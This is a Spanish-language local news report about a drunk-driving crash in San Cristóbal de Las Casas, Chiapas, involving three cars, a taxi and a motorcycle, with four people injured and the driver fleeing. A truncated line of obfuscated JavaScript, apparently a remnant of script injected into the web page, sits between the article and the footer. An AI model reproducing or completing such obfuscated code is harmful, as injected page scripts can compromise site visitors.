Personas en estado inconveniente provocan fuerte choque

Óscar Gómez

1 de septiembre del 2022. San Cristóbal de Las Casas.- Cuatro lesionados y varios daños materiales en tres vehículos y una motocicleta, fue el saldo de un choque, que se dio sobre el boulevard Juan Sabines Gutiérrez, justo en la subida del cerrito de San Cristóbal, esto alrededor de las 12 de la media noche, ya que a esa hora los semáforos dejan de funcionar.

De acuerdo a las versiones de algunas personas que circulaban en la zona, el conductor de un vehículo volkswagen golf gti tcr dsg7 -rojo tornado, conducía a exceso de velocidad y al parecer en estado inconveniente, impactándose en la parte trasera de un vehículo Chevrolet, que a su vez se impactó contra un Nissan del servicio público en su modalidad de Taxi, empujando además al conductor de una motocicleta.

Tras el reporte al 911, acudieron elementos de Tránsito, paramédicos de Protección Civil quienes dieron atención a los lesionados, pero el conductor de un vehículo se dio a la fuga, y fue el señalado de ser el responsable.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Persiguen y balean a sujeto en la zona Oriente de Tuxtla

Jairo Camacho. Agencia ReporteCiudadano, 17 de febrero del 2026. Tuxtla Gutiérrez.- Este martes por la …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *